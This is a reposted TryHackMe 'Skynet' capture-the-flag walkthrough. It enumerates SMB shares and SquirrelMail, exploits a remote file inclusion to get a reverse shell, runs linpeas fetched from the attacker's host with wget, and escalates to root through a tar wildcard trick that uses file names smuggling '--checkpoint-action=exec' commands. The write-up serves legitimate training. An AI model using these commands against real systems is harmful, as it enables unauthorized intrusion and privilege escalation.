[TryHackMe] Skynet Walkthrough Using Remote File Inclusion : Benjamin Reitz
[TryHackMe] Skynet Walkthrough Using Remote File Inclusion
by: Benjamin Reitz
blow post content copied from Finxter
click here to view original post
January 30, 2023 at 10:26PM
Click here for more details...
=============================
The original post is available in Finxter by Benjamin Reitz
this post has been published as it is through automation. Automation script brings all the top bloggers post under a single umbrella.
The purpose of this blog, Follow the top Salesforce bloggers and collect all blogs in a single place through automation.
============================
by: Benjamin Reitz
blow post content copied from Finxter
click here to view original post
How I used a remote file inclusion vulnerability to hack and root the Terminator’s computer
CHALLENGE OVERVIEW
- Link: https://tryhackme.com/room/skynet
- Difficulty: Easy
- Target:
user/rootflags - Highlight: exploiting a remote file inclusion vulnerability to spawn a reverse shell
- Tools used:
smbclient,smbmap,gobuster,metasploit - Tags: gobuster, smb, rfi, squirrelmail
BACKGROUND
In this walkthrough, we will root a terminator-themed capture-the-flag (CTF) challenge box.
IPs
export targetIP=10.10.144.117 export myIP=10.6.2.23
ENUMERATION
sudo nmap -p- -T5 -A -oN nmapscan.txt 10.10.144.117 -Pn
NMAP SCAN RESULTS
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-23 18:33 EST
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.10% done
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 2.13% done; ETC: 18:35 (0:02:18 remaining)
Stats: 0:00:05 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 2.35% done; ETC: 18:36 (0:02:46 remaining)
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 2.56% done; ETC: 18:36 (0:03:10 remaining)
Nmap scan report for 10.10.144.117
Host is up (0.084s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES CAPA PIPELINING UIDL TOP SASL AUTH-RESP-CODE
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: IMAP4rev1 ID LOGIN-REFERRALS have LOGINDISABLEDA0001 capabilities more post-login ENABLE listed LITERAL+ Pre-login OK IDLE SASL-IR
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Android 5.1 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 3h27m51s, median: 4h59m59s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2023-01-24T04:40:37
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2023-01-23T22:40:36-06:00
TRACEROUTE (using port 554/tcp)
HOP RTT ADDRESS
1 13.67 ms 10.6.0.1
2 ... 3
4 81.31 ms 10.10.144.117
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 443.46 seconds
DIRB SCAN RESULTS
The SquirrelMail directory looks interesting. We’ll check that out in a minute.
ENUMERATE THE SMB SHARE WITH NMAP SCAN:
nmap --script smb-enum-shares -p 139 10.10.144.117
Output:
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-23 18:56 EST
Nmap scan report for 10.10.144.117
Host is up (0.086s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.144.117\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (skynet server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.144.117\anonymous:
| Type: STYPE_DISKTREE
| Comment: Skynet Anonymous Share
| Users: 0
| Max Users: <unlimited>
| Path: C:\srv\samba
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.144.117\milesdyson:
| Type: STYPE_DISKTREE
| Comment: Miles Dyson Personal Share
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\milesdyson\share
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.144.117\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
smbmap -H 10.10.144.117
[+] Guest session IP: 10.10.144.117:445 Name: 10.10.144.117
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
anonymous READ ONLY Skynet Anonymous Share
milesdyson NO ACCESS Miles Dyson Personal Share
IPC$ NO ACCESS IPC Service (skynet server (Samba, Ubuntu))
LOGIN TO SAMBA SHARES AS ANONYMOUS
smbclient //10.10.144.117/anonymous
Password for [WORKGROUP\kalisurfer]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 26 11:04:00 2020
.. D 0 Tue Sep 17 03:20:17 2019
attention.txt N 163 Tue Sep 17 23:04:59 2019
logs D 0 Wed Sep 18 00:42:16 2019
grab the log1.txt (a password list)
milesdyson (username)
WALK THE WEBSITE
We discovered a login portal for squirrelmail from the dirb scan. Let’s check it out now in our browser.
http://10.10.144.117/squirrelmailLoading the site reveals a version number. A quick search points to a local file inclusion vulnerability.
SquirrelMail version 1.4.23 [SVN] Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion
ENUMERATING THE SMB SHARE
The first password from the log1.txt file from the smb share on the list works! We are in milesdyson’s email account now and see two interesting emails.
serenakogan@skynet
01100010 01100001 01101100 01101100 01110011 00100000 01101000 01100001 01110110
01100101 00100000 01111010 01100101 01110010 01101111 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111
skynet@skynet
new smb password: )s{A&2Z=F^n_E.B`
LOGIN TO SMB SHARE AS milesdyson
smbclient //$targetIP/milesdyson -U milesdyson
Password for [WORKGROUP\milesdyson]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Sep 17 05:05:47 2019
.. D 0 Tue Sep 17 23:51:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 05:05:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 05:05:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 05:05:14 2019
notes D 0 Tue Sep 17 05:18:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 05:05:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 05:05:14 2019
9204224 blocks of size 1024. 5831424 blocks available
Let’s grab the important.txt file:
get important.txt
Reading through the contents, we are pointed toward a hidden beta cms directory
/45kra24zxs28v3yd
GOBUSTER FOR DIRECTORY SNIFFING
We’ll further enumerate the hidden beta cms directory now with gobuster.
gobuster dir -uhttp://10.10.221.72/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.169.173/45kra24zxs28v3yd/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2023/01/24 09:52:22 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/administrator (Status: 301) [Size: 339] [--> http://10.10.169.173/45kra24zxs28v3yd/administrator/]
Progress: 337 / 4615 (7.30%) Progress: 397 / 4615 (8.60%) Progress: 456 / 4615 (9.88%) Progress: 507 / 4615 (10.99%) Progress: 558 / 4615 (12.09%) Progress: 618 / 4615 (13.39%) Progress: 674 / 4615 (14.60%) Progress: 728 / 4615 (15.77%) Progress: 788 / 4615 (17.07%) Progress: 845 / 4615 (18.31%) Progress: 898 / 4615 (19.46%) Progress: 956 / 4615 (20.72%) Progress: 1015 / 4615 (21.99%) Progress: 1072 / 4615 (23.23%) Progress: 1125 / 4615 (24.38%) Progress: 1185 / 4615 (25.68%) Progress: 1245 / 4615 (26.98%) Progress: 1299 / 4615 (28.15%) Progress: 1359 / 4615 (29.45%) Progress: 1419 / 4615 (30.75%) Progress: 1472 / 4615 (31.90%) Progress: 1532 / 4615 (33.20%) Progress: 1590 / 4615 (34.45%) Progress: 1640 / 4615 (35.54%) Progress: 1700 / 4615 (36.84%) Progress: 1750 / 4615 (37.92%) Progress: 1804 / 4615 (39.09%) Progress: 1864 / 4615 (40.39%) Progress: 1904 / 4615 (41.26%) Progress: 1964 / 4615 (42.56%) Progress: 2020 / 4615 (43.77%) /index.html (Status: 200) [Size: 418]
Progress: 2063 / 4615 (44.70%) Progress: 2123 / 4615 (46.00%) Progress: 2173 / 4615 (47.09%) Progress: 2216 / 4615 (48.02%) Progress: 2273 / 4615 (49.25%) Progress: 2333 / 4615 (50.55%) Progress: 2383 / 4615 (51.64%) Progress: 2443 / 4615 (52.94%) Progress: 2503 / 4615 (54.24%) Progress: 2563 / 4615 (55.54%) Progress: 2618 / 4615 (56.73%) Progress: 2673 / 4615 (57.92%) Progress: 2733 / 4615 (59.22%) Progress: 2782 / 4615 (60.28%) Progress: 2842 / 4615 (61.58%) Progress: 2903 / 4615 (62.90%) Progress: 2962 / 4615 (64.18%) Progress: 3020 / 4615 (65.44%) Progress: 3075 / 4615 (66.63%) Progress: 3135 / 4615 (67.93%) Progress: 3194 / 4615 (69.21%) Progress: 3254 / 4615 (70.51%) Progress: 3305 / 4615 (71.61%) Progress: 3364 / 4615 (72.89%) Progress: 3424 / 4615 (74.19%) Progress: 3484 / 4615 (75.49%) Progress: 3544 / 4615 (76.79%) Progress: 3597 / 4615 (77.94%) Progress: 3655 / 4615 (79.20%) Progress: 3707 / 4615 (80.33%) Progress: 3767 / 4615 (81.63%) Progress: 3827 / 4615 (82.93%) Progress: 3887 / 4615 (84.23%) Progress: 3947 / 4615 (85.53%) Progress: 4001 / 4615 (86.70%) Progress: 4058 / 4615 (87.93%) Progress: 4115 / 4615 (89.17%) Progress: 4174 / 4615 (90.44%) Progress: 4234 / 4615 (91.74%) Progress: 4285 / 4615 (92.85%) Progress: 4338 / 4615 (94.00%) Progress: 4398 / 4615 (95.30%) Progress: 4458 / 4615 (96.60%) Progress: 4513 / 4615 (97.79%) Progress: 4570 / 4615 (99.02%)
===============================================================
2023/01/24 09:53:04 Finished
===============================================================
ADMINISTRATOR PORTAL DISCOVERED!
http://10.10.169.173/45kra24zxs28v3yd/administrator/
IDENTIFY A KNOWN VULNERABILITY
Looking up the service name shows us that there is a remote file inclusion vulnerability.
SPAWN A REVERSE SHELL WITH PHP PENTEST MONKEY AND REMOTE FILE INCLUSION
After preparing a basic php revshell, serving it with a simple HTTP server, we now go to our browser and load the address:
STABILIZE THE SHELL
python -c 'import pty;pty.spawn("/bin/bash")';
ENUMERATE WITH LINPEAS
After downloading linpeas.sh and serving it with the simple HTTP server, we can copy it over to our target machine’s /tmp folder with wget http://$myIP:port/linpeas.sh.
$ ./linpeas.sh
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Get the latest version : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it on your own computers and/or with the computer owner’s permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
╚═══════════════════╝
OS: Linux version 4.8.0-58-generic (buildd@lgw01-21) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: skynet
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)
[+] /bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE
╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 4.8.0-58-generic (buildd@lgw01-21) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017
Distributor ID: Ubuntu
Description: Ubuntu 16.04.6 LTS
Release: 16.04
Codename: xenial
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.16
╔══════════╣ CVEs Check
Vulnerable to CVE-2021-4034
Potentially Vulnerable to CVE-2022-2588
---abbreviated ---
THE MOST RELEVANT INFO FROM LINPEAS in bold:
VULNERABLE TO CVE-2021-4034
MAYBE CVE-2022-2588
https://github.com/carlospolop/PEASS-ng/releases/download/20230122/linpeas.sh
[+] [CVE-2017-16995] eBPF_verifier
Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Exposure: highly probable
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
FURTHER ENUMERATION
Let’s probe a bit more into this machine for some of the common Linux privilege escalation pathways.
CHECK CRONJOBS
cat /etc/crontab
Output:
# m h dom mon dow user command
*/1 * * * * root /home/milesdyson/backups/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
The first job in the list is set to run every minute and it just executes backup.sh. Let’s find out what that file does.
We can see that backup.sh starts a new shell, changes directory to /var/www/html and then creates a tarball file of all the files from /var/www/html and stores it in home/milesdyson/backups/backup.tgz
The * is a wildcard symbol that means everything in the current directory. We can exploit this by adding our own files and using file names with unusual extensions to launch a malicious file, magic.sh as part of the automated cronjob that runs backup.sh and creates a tarball every minute of the contents of the directory.
PLAN AND CARRY OUT PRIVILEGE ESCALATION
First, we’ll create the magic.sh file that will add a SUID bit to /bin/bash. The next time we spawn a shell after setting up the hack and waiting at least 1 minute, we can use persistence mode (/bin/bash -p) to spawn a root shell.
printf '#!/bin/bash\nchmod +s /bin/bash' > magic.sh
Next, let’s use echo to create two more files with unusual names that are necessary for the tarball creation process to trigger our magic.sh program and add the SUID bit to /bin/bash.
echo "/var/www/html" > "--checkpoint-action=exec=sh magic.sh" echo "/var/www/html" > --checkpoint=1
USER FLAG
Let’s grab the root flag from /home/milesdyson
$ cat user.txt 7c—-omitted—----07
ROOT FLAG
cat /root/root.txt 3f—-omitted—----49
TAKE-AWAYS
Takeaway #1 – The simpler solution is usually the better solution. - I wasted a lot of time trying to get Metasploit to catch the reverse shell and start a meterpreter session.
In the end, I learned I had overlooked setting the payload on msfconsole listener (exploit(multi/handler)) to match that of my reverse shell payload.
It’s not listed when you search “options”, but it is still necessary to set it to be able to properly catch the shell and start a meterpreter session. I used a basic shell session to root the box, and all of that precious time spent on metasploit didn’t help us get root access.
Takeaway #2 – Remote file inclusion vulnerabilities allow threat actors to carry out arbitrary code execution. In practice, this means that your machine can be quickly compromised, all the way down to the root user.
January 30, 2023 at 10:26PM
Click here for more details...
=============================
The original post is available in Finxter by Benjamin Reitz
this post has been published as it is through automation. Automation script brings all the top bloggers post under a single umbrella.
The purpose of this blog, Follow the top Salesforce bloggers and collect all blogs in a single place through automation.
============================
Post a Comment